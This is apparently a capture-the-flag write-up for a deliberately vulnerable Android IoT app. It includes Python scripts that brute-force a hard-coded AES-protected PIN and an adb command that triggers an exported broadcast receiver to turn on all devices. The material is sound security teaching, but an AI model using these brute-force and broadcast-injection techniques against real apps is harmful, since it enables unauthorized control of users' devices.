IOT Connect

Hello everyone. In this blog post I will try to explain my solution steps for the IOT Connect challenge from the Mobile Hacking Lab platform. I hope it will be useful for you.

  1. After installing the APK, we open it, register, and log in with our account.

  2. After logging in, we find that we cannot control all of the devices.

  3. Our goal is to enable the Master Switch, so let's try to use it.

  4. We don't have a PIN code.

  5. Let's examine the AndroidManifest.xml, and specifically the activity com.mobilehackinglab.iotconnect.MasterSwitchActivity

    • This code tells us a few things:

      • Initially the user cannot control the Master Switch.

      • A valid user must enter a PIN before enabling the switch.

      • Only then does the app send the intent that enables the Master Switch.

  6. Let's examine the class that initializes the BroadcastReceiver; there we find that:

    it only does its work when the PIN is correct.

  7. After searching through the code, I found the Checker class.

  8. Here we find the hard-coded, base64-encoded ciphertext OSnaALIWUkpOziVAMycaZQ==. The app decrypts it with AES using a key derived from the PIN the user enters, and the PIN is accepted when the result is master_on. Everything needed to check a PIN (ciphertext, key derivation and expected plaintext) ships inside the APK, so we can brute-force the PIN offline; let's write a script to do that.

    # Requires pycryptodome: pip install pycryptodome
    from Crypto.Cipher import AES
    import base64
    
    encrypted_text = 'OSnaALIWUkpOziVAMycaZQ=='  # The base64 encoded string from the Java code
    
    def create_key_from_number(num):
        """
        Create a 16-byte key from a number by converting it to a byte array
        and padding with zeros to ensure the key length is 16 bytes.
        """
        key = str(num).encode('utf-8')  # Convert number to bytes
        key = key.ljust(16, b'\0')  # Pad the key to 16 bytes if it's shorter
        return key
    
    def attempt_decrypt(encrypted_text, key):
        """
        Attempt to decrypt the encrypted text using the provided key.
        Returns the decrypted text if successful, or None if decryption fails.
        """
        cipher = AES.new(key, AES.MODE_ECB)
        try:
            decrypted_bytes = cipher.decrypt(base64.b64decode(encrypted_text))
            # A wrong key usually yields bytes that are not valid UTF-8, which
            # raises UnicodeDecodeError and is treated as a failed attempt.
            decrypted_text = decrypted_bytes.decode('utf-8').strip()
            return decrypted_text
        except (ValueError, UnicodeDecodeError):
            return None
    
    def brute_force_decrypt(encrypted_text):
        """
        Brute-force attempt to find the correct key for AES decryption.
        Searches for a key that produces meaningful output, like "master_on".
        """
        for num in range(1000):
            key = create_key_from_number(num)
            decrypted_text = attempt_decrypt(encrypted_text, key)
            
            # The decrypted block still carries the cipher's padding bytes after
            # "master_on", so look for the substring rather than an exact match.
            if decrypted_text and "master_on" in decrypted_text:
                print(f"Decrypt success and the key is {num}")
                print(f"Decrypted text: {decrypted_text}")
                return
        print("No valid key found")
    
    # Start the brute-force decryption attempt
    brute_force_decrypt(encrypted_text)
    
  9. Then we trigger the MasterReceiver broadcast receiver ourselves, sending the MASTER_ON action with 345 as the key extra: adb shell am broadcast -a MASTER_ON --ei key 345

And with that we are done: all devices are turned on.
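To tie steps 8 and 9 together, here is an added example (my own code, not the challenge's or the author's script) that models the PIN check the way the brute-force script above implies the Checker class performs it, recovers the PIN exhaustively, and builds the broadcast command from the result. The key derivation (decimal PIN as ASCII, NUL-padded to 16 bytes), the cipher mode (AES-128 ECB with PKCS#7 padding) and the exact-match against master_on are assumptions reconstructed from the post, not verified against the APK; the ciphertext is the one quoted in step 8. It needs either pycryptodome or cryptography installed for AES.

```python
"""Added example: model of the IOT Connect PIN check plus an offline brute force.

Assumptions (reconstructed from the post, not verified against the APK):
 - AES key = decimal PIN as ASCII, NUL-padded to 16 bytes
 - AES-128 in ECB mode with PKCS#7 padding
 - the PIN is accepted when the plaintext is exactly "master_on"
Requires pycryptodome or cryptography for the AES primitive.
"""
import base64
from typing import Optional

try:
    from Crypto.Cipher import AES  # pycryptodome

    def aes_ecb_decrypt(key: bytes, data: bytes) -> bytes:
        return AES.new(key, AES.MODE_ECB).decrypt(data)
except ImportError:
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def aes_ecb_decrypt(key: bytes, data: bytes) -> bytes:
        dec = Cipher(algorithms.AES(key), modes.ECB()).decryptor()
        return dec.update(data) + dec.finalize()

# Hard-coded ciphertext quoted from the Checker class in step 8.
CIPHERTEXT_B64 = "OSnaALIWUkpOziVAMycaZQ=="
EXPECTED_PLAINTEXT = "master_on"


def key_from_pin(pin: int) -> bytes:
    """Assumed app-side key derivation: decimal digits, NUL-padded to 16 bytes."""
    digits = str(pin).encode("ascii")
    if len(digits) > 16:
        raise ValueError("PIN too long for a 16-byte AES key")
    return digits.ljust(16, b"\0")


def pkcs7_unpad(block: bytes) -> Optional[bytes]:
    """Strip PKCS#7 padding; None when the padding is malformed (wrong key)."""
    if not block:
        return None
    n = block[-1]
    if not 1 <= n <= 16 or block[-n:] != bytes([n]) * n:
        return None
    return block[:-n]


def decrypt_with_pin(ciphertext_b64: str, pin: int) -> Optional[str]:
    """Decrypt the stored ciphertext with a PIN-derived key; None on garbage."""
    raw = aes_ecb_decrypt(key_from_pin(pin), base64.b64decode(ciphertext_b64))
    plain = pkcs7_unpad(raw)
    if plain is None:
        return None
    try:
        return plain.decode("utf-8")
    except UnicodeDecodeError:
        return None


def check_pin(pin: int) -> bool:
    """What the app effectively does before it sends MASTER_ON."""
    return decrypt_with_pin(CIPHERTEXT_B64, pin) == EXPECTED_PLAINTEXT


def recover_pin(ciphertext_b64: str, max_digits: int = 4) -> Optional[int]:
    """Attacker side: every input to the check is in the APK, so try every PIN.

    max_digits is an assumption; the post only needs 3 digits (range(1000)).
    """
    for pin in range(10 ** max_digits):
        if decrypt_with_pin(ciphertext_b64, pin) == EXPECTED_PLAINTEXT:
            return pin
    return None


def broadcast_command(pin: int) -> str:
    """The adb command from step 9, with the recovered PIN as the key extra."""
    return f"adb shell am broadcast -a MASTER_ON --ei key {pin}"


if __name__ == "__main__":
    found = recover_pin(CIPHERTEXT_B64)
    if found is None:
        print("no PIN found")
    else:
        print(f"PIN {found} -> {decrypt_with_pin(CIPHERTEXT_B64, found)!r}")
        print(broadcast_command(found))
```

Two things this makes concrete. The check is reversible offline because the APK carries the ciphertext, the key derivation and the expected plaintext, and a numeric PIN gives at most a few thousand candidates, so stronger cryptography on the client would not help; the PIN would have to be verified by something the attacker cannot run locally, such as the backend. And because the adb broadcast in step 9 is sent from the shell user and still reaches MasterReceiver, the receiver accepts MASTER_ON from outside the app, so any app on the device that learns the PIN can flip the switch without ever showing the activity.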
